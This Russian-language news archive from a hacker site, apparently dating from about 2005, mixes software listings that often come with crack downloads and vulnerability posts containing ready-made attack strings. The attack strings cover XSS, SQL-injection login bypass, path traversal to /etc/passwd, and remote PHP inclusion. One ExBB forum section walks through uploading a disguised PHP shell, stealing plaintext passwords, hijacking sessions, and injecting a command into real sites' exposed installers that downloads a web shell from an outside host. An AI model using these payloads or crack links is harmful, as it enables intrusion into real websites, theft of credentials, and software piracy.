Архив новостей (2004-2015 год)

[scaM]

MegaLeecher 1.0.4

Сейчас в моде стало,заливат файлы на какой нить сервер и давать ссылки на этот файл.Вот эта программа создана специально для того,чтоб вы не ждали каждый раз по минуте,а получали ссылки сразу.

Скачать|Download

 

[Winux]

Friendly Pinger 5.0

Friendly Pinger 5.0 - это мощное и удобное приложение для администрирования, мониторинга и инвентаризации компьютерных сетей. Программа подойдет и для начинающего администратора.
Имеет массу возможностей:

• Визуализация компьютерной сети в красивой анимационной форме
• Отображение, какие компьютеры включены, а какие нет
• Пингование всех устройств за раз
• Оповещение в случае остановки/запуска серверов
• Инвентаризация программного и аппаратного обеспечения всех компьютеров в сети
• Слежение, кто "лазает" по Вашему компьютеру и какие файлы качает
• Назначение внешних команд (telnet, tracert, net.exe) устройствам
• Поиск HTTP, FTP, e-mail и других сетевых служб

Скриншот|Screenshot
Скриншот|Screenshot
Скриншот|Screenshot
Скачать|Download
:zns1: Крэк|Crack

 

[Winux]

HDD Regenerator 1.51

Программа восстанавливает bad-сектора жесткого диска на физическом уровне.
Работает со всеми файловыми системами, причем информация не теряется
в процессе восстановления.
Инсталляха создает прогу для создания загрузочной дискеты с HDD Regenerator'ом, и возможно что она позволяет и в реальном времени (из под винды) это делать, но в триальной версии ничего этого я не смог, прюс триалка восстанавливает только первый сбойный сектор.
Это готовый образ! Вставь дискету и запусть программу![New$paN]

HDD Regenerator - уникальная программа для регенерации жестких дисков. Программа устраняет физические повреждения (сбойные секторы) на поверхности жесткого диска.
Программа не скрывает сбойные секторы, она действительно восстанавливает их!

Как работает HDD Regenerator
----------------------------
Почти 60% всех повреждений поверхности жестких дисков (сбойных секторов) - следствие неправильного намагничивания. Наши исследования были успешны, и мы нашли алгоритм, который использует специальную последовательность сигналов высокого и низкого уровня. Эти сигналы, сгенерированые программой, воздействуют на поврежденную поверхность. Даже форматирование на низком уровне не способно решить эту задачу!

Основные преимущества HDD Regenerator
-------------------------------------

HDD Regenerator восстанавливает сбойные секторы методом магнитной инверсии.
Если Ваш жесткий диск имеет повреждения в виде сбойных секторов, он не только становится непригодным к дальнейшему использованию, но также существует риск потери всей информацию, имеющейся на диске.
HDD Regenerator восстановит ваш жесткий диск (почти 60% поврежденных жестких дисков подлежат регенерации). В результате, не читаемая поврежденная информация будет восстановлена. Причем при всех этих действиях существующая информация не будет затрагиваться!

Работа HDD Regenerator в консольном режиме
-------------------------------------------

Чтобы запустить HDD Regenerator в консольном режиме, загрузитесь с загрузочной дискетты HDD Regenerator.

После того, как запустится HDD Regenerator следует:
1. Выбрать диск для восстановления;
2. Ввести параметр 'смещение от начала диска'. Оставьте этот параметр, равным '0', если Вы хотите сканировать весь диск полностью. Ввод смещения используется, если Вы не хотите сканировать диск с начала.
Например, Вы не хотите сканировать первые 5 Гбайт Вашего жесткого диска, чтобы съэкономить время, потому что Вы уверены, что этот раздел поверхности не содержит сбойных секторов. В этом случае следует ввести смещение, равное 5000 с символом 'm' после ввода числового значения или 2560000 без 'm' (в последнем случае - это количество секторов: 5000x512=2560000)
3. Ждите, пока сканирование не закончится.
Если Вы используете зарегистрированную версию, Вы можете найти информацию о восстановленных секторах в файле hddreg.log.

Скачать|Download

 

[Winux]

XSS в Complete PHP Counter
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует при обработке входных данных в сценарии list.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы и выполнить произвольные SQL команды в базе данных приложения. Примеры далее[New$paN]:

http://[target]/[php-counter]/list.php?c='>
<script>alert(document.cookie);</script>

http://[target]/[php-counter]/list.php?c='&s='

:zns2: Производитель

 

[Winux]

SQL-инъекция в versatileBulletinBoard 1.0.0RC2

Удаленный пользователь может произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. SQL-инъекция возможна, при выключенной опции magic_quotes_gpc, из-за недостаточной обработки входных данных в различных переменных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

2. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре file сценария imagewin.php и параметре url файла dereferrer.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта.

3. Удаленный пользователь может просмотреть версии установленных сценариев, запросив файл getversions.php.
[New$paN]
:zns2: Производитель
:zns2: Подробно о сплойте

 

[Winux]

http://news.xss.pro/exbb.jpg
1. Приаттачивание шела.
Смотрим код:

$img = false;

if ( preg_match('#image\/[x\-]*([a-z]+)#', $HTTP_POST_FILES['FILE_UPLOAD']['type']) ) {//Проверяется заголовок
  	list($width, $height) = @getimagesize($HTTP_POST_FILES['FILE_UPLOAD']['tmp_name']);
  	$FILE_NAME = uniqid("att-").substr($FILE_NAME,-8);
  	$storage_name = $FILE_NAME;
  	$img = true;
  	$filetoopen = $exbb['home_path'].'uploads/'.$name;
  	if ( file_exists($filetoopen) ) @unlink($filetoopen);
}

Берем картику переименовываем в *.php, дописываем в конец <?include $u;?> и шелл уже на серваке.
Остальные баги далее...
[New$paN]
2. Левый скрипт закачки.

if ($vars['f'] == '' || $vars['t'] == '' || $vars['id'] == '') error($lang['Main_msg'],$lang['Dont_chg_url'],'',1);

$filetoopen = $exbb['home_path'].'forum'.$vars['f'].'/attaches-'.$vars['t'].'.php';
$t_attaches = ( file_exists($filetoopen) ) ? get_file($filetoopen) : array();

Переменные f,t,id не фильруются совсем, где (int) )), например можно присвоить переменной t что-нибудь типа ../../../../../eat )
Это дает возможность скачать любой файл, например файл юзера, конфиг.

Уязвимость актуальна, если у вас есть доступ к серверу под другим юзером, закидываем файл(поменяв имя файла на /home/user/forum/members/1.php с настройками в темп, ставим права 777.
Потом заходим по линку:
http:/bug.ru/forum/tools?f=1&t=/../../../../../eat&id=1 и скачиваем файл с именем и паролем юзверя, а пароль хранится в незашифрованном виде!

3. Задание вместо имени языка любого значения, например ../../.. правда к этому счастью прибавляется еще строка :/, а потом файл инклудится!
Уязвимость актуальна, если у вас есть доступ к серверу под другим юзером.

4. Встраивание вместо аватара любого линка ), например скрипта с редиректом, для смены параметров, создания нового админа ).

5. Если посмотреть, как обстоят дела со скриптом инсталляции. Введем в поиске exbb, и ,выбирая домены второго уровня, добавляем к линку install.php
И что вы думаете, больше 10 сайтов с незалоченным скриптом установки (это, как правило сайты, переносившие форум). Вводим вместо линка на форум:
http://localhost/forum2'; fwrite(fopen('sh.php',w),implode('',file('http://pro-hack.ru/shell.txt')));////
Завершаем установку. Грузим индекс. В папке форума появляется веб шел )

6. Защита от перехвата сессий - никакая ) подсматриваем в темпе индификатор сесси, будет например: sess_300122f4a852a84e44614f1124716eb9
Пишем урл: http://bug/index.php?PHPSESSID=300122f4a85...4614f1124716eb9 Все друг, проснись ты в админке )

 

[Winux]

Отказ в обслуживании Mozilla Firefox <= 1.0.7 (Mozilla = 1.7.12)

Вот этот код вызывает переполнение буфера в данном браузере, благодаря чему он благополучно выключается(Читаем далее):[New$paN]

<html>
<script language="JavaScript">
document.write('<link rel="stylesheet" href="http://">');
</script>
</html>

 

[Winux]

Adium X 0.82
http://news.xss.pro/adium.gif
Я конечно понимаю, что далеко не каждый из Вас юзает яблочко, однако для этой яблочно-маковой системы оказывается есть и интернет-пейджер. Причем пейджер, судя по описанию далеко не плохой. Поддерживает стандарты: ICQ, Jabber, AOL, MSN, Yahoo, .Mac, Bonjour, Gadu-Gadu, Lotus Sametime, Novel GroupWise, Yahoo Japan, Zephyr! [New$paN]

Итак, что же умеет наша “Утка”:
Во-первых, она умеет работать со всеми популярными стандартами мессенджеров на сегодняшний день - ICQ, Jabber, AOL, MSN, Yahoo, .Mac, Bonjour, Gadu-Gadu, Lotus Sametime, Novel GroupWise, Yahoo Japan, Zephyr! Поставив “утку”, смело можете быть уверенными, что в 99% вы сможете поговорить с человеком, использующим любой мессенджер.

Во-вторых, внешний вид поддерживает скины, фактически все, что придет в голову, можно изменить. Аваторы, иконки, символы, ширину значков, шрифты, прозрачности, целая масса всего, что позволит Вам настроить его так, как в голову прийдет.

В-третьих, поддержка звуковых схем и всего другого, что сделает утку навороченнее некуда, все это можно скачать на www.adiumxtras.com

:zns2: Читаем боее
Скачать|Download
Скриншоты|Screenshots

 

[scaM]

Pinnacle TitleDeko Pro 2.0.1634.1

Профессиональный пакет для созданя титров. Символьный генератор эфирного качества Простое создание превосходных титров непосредственно на видео благодаря новой функции "Создание в контексте" Просмотр во время создания изображения на видеомониторе, используя новую функцию "Взять".
[New$paN]
Скачать|Download
:zns1: Кряк|Crack

 

[scaM]

Advanced Uninstaller Pro 2005 7.0

Программа для корректного и полного удаления ставших ненужными программ с множеством дополнительных возможностей - от возможности редактировать список автозагружаемых программ и управлять установленными в системе шрифтами до оптимизации системного реестра, настройки тулбара Internet Explorer и удаления cookies.
[New$paN]
Скачать|Download
:zns1: Кряк|Crack

 

[scaM]

SpamWasher v2.0.1000

Антиспамовская программа для удаления Спама из Вашего почтового ящика. Удобна в работе; поддерживает черные и белые списки; работает с фильтрами; есть возможность импорта адресов из Outlook, Outlook Express, Netscape Mail, Mozilla и Eudora; есть возможность возврата писем отправителю Спама; поддержки нескольких адресов для одного аккаунта; выявление Спама может производиться с помощью постоянно обновляемого пакета правил и т.д. Патч переводит все окна и диалоги программы, кроме подписей в основном окне.[New$paN]
Скачать|Download
:zns1: Кряк|Crack

 

[Winux]

В Екатеринбурге открылся первый в России и самый большой в мире памятник копьютеру. Пока из камня вырезана только клавиатура, однако планируется поставить еще и мышь с системным блоком. Вес каждой клавиши около 70 килограмм, а пробел весит вообще около 500. На текущий момент это самая большая клава в мире.
Новый памятник сразу же стал центром общения. Кнопок хватает для всех. Клавиатура сама подсказывает темы разговоров. По заявлению первого канала, дети прыгают по клавишам, а подростки постарше пьют на нем пиво. Ох убил бы гадов, если бы такое сотворили с моей клавкой.
Теперь фраза "жми на клаву" звучит как пароль, обозначающий конкретное место встречи - у гигантской компьютерной клавиатуры. [New$paN]
Так художник Анатолий Вяткин увековечил в бетоне орудие труда программиста. Его клавиатура - это символ человеческого общения в эпоху высоких технологий.
Однако, не прошло и недели, как местные хакеры (подозрение у меня падает на админов асечки, многие из них там живут) съели аж 2 кнопки: F1 и F2. Архитекторы говорят, что слямзили их не просто так, чтоб дом на даче подписать, а кража имела символическое значение. Какое именно я понять так и не смог, ибо этими кнопками сам лично не пользуюсь.

 

[Winux]

Бага в W-Agora 4.2.0

Обнаружена опасная уязвимость в форумной системе W-Agora 4.2.0, которая может быть использована в качестве системы поддержки доски объявлений, гостевой книги или публикации. Т.е. движок очень популярный и функциональный. Уязвимость позволяет получить хакеру произвольный файл с сервера.
Примеры далее...[New$paN]
1. Уязвимость существует из-за недостаточной обработки входных данных в параметре site сценария extras/quicklist.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий, находящийся на целевой системе.
2. Уязвимость обнаружена в сценариях browse_avatar.php и insert.php
Примеры:

http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd%00
http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd
http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini%00
http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini

 

[Winux]

Обход каталога в PHP-Nuke

Уязвимость позволяет удаленному пользователю просмотреть произвольные файлы на целевой системе.
Эксплойты далее...[New$paN]
Уязвимость существует в сценарии 'modules.php' из-за недостаточной обработки входных данных. Удаленный пользователь может послать HTTP GET или POST запрос и просмотреть произвольные файлы на системе. Пример:

http://[target]/[nuke_dir]/modules.php?name=Search
&file=../../../../../../ ../../../etc/passwd%00

Некоторые версии PHP-Nuke не содержат всех файлов форума phpbb. Если отсутствует файл 'extension.inc' в каталоге 'modules/Forums/', удаленный пользователь может с помощью специально сформированного URL просмотреть произвольные файлы на системе. Пример:

http://[target]/[nuke_dir]/modules.php?name=Search&
file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd

:zns2: Производитель

 

[Winux]

Межсайтовый скриптинг и PHP-инклюдинг в MySource 2.14.0

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей и выполнить произвольный PHP сценарий на целевой системе.
Подробности дале...[New$paN]
1. Межсайтовый скриптинг возможет из-за недостаточной обработки входных данных перед отображением их в браузере пользователей. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[victim]/web/edit/upgrade_in_progress_backend.php?target_url=">[code]
http://[victim]/squizlib/bodycopy/pop_ups/insert_table.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/header.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_row_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_type_wysiwyg.php?stylesheet=">[code]

2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Примеры:

http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://[host]/[file]?
http://[victim]/web/init_mysource.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/pear/Net_Socket/Socket.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/HTTP_Request/Request.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail/Mail.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date/Span.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mime.php?PEAR_PATH=http://[host]/[file]?

Для удачной эксплуатации уязвимостей должна быть включена опция register_globals

:zns2: Производитель

 

[Winux]

SQL-инъекция в e107
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует в сценарии 'resetcore.php' из-за недостаточной обработки входных файлов. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример(далее)[New$paN]:

user: ' or isnull(1/0)/*
password: [nothing]

:zns2: Производитель

 

[scaM]

Nicos Commander v5.57

Nico Commander - это простой в использовании файловый менеджер с поддержкой ZIP, работает с FTP-серверами, обладает вьювером просмотра графических данных и текстовым редактором.[New$paN]
Скачать|Download
:zns1: Кряк|Crack

 

[scaM]

System Mechanic Professional v6.0F

System Mechanic - пакет утилит, предназначенный для поддержки работоспособности компьютера на высшем уровне. В этот пакет входят почти 20 утилит, каждая из которых отвечает за определённый компьютерный параметр. System Mechanic умеет искать ненужные и повторяющиеся файлы, чистить реестр, находить неверные ярлыки, удалять нерабочие ссылки на удаление программ, отслеживать изменения, сделанные при инсталляции, управлять автозагрузкой, производить очистку жесткого диска от ненужных файлов и т.д. Вы можете самостоятельно работать с этой программой или настроить её на автоматическую работу по расписанию. System Mechanic выпускается в 2-х вариантах: обычный (базовый) и Professional, с расширенным набором утилит (антивирусная защита, файрволл, утилита для удаления шпионских модулей, модуль защиты от троянов, утилита для восстановления удалённых файлов и т.д.).[New$paN]
Скачать|Download
:zns1: Крэк|Crack

 

[Winux]

Самый продаваемый журнал в мире по компьютерному искусству. Закачка далее...[New$paN]
Скачать|Download - 8.2003

Скачать|Download - 7.2003

 

[Winux]

В. В. Шупрута Delphi 2005. Учимся программировать

М.Фленов Delphi 2005. Секреты программирования

Подробности и закачка под катом....[New$paN]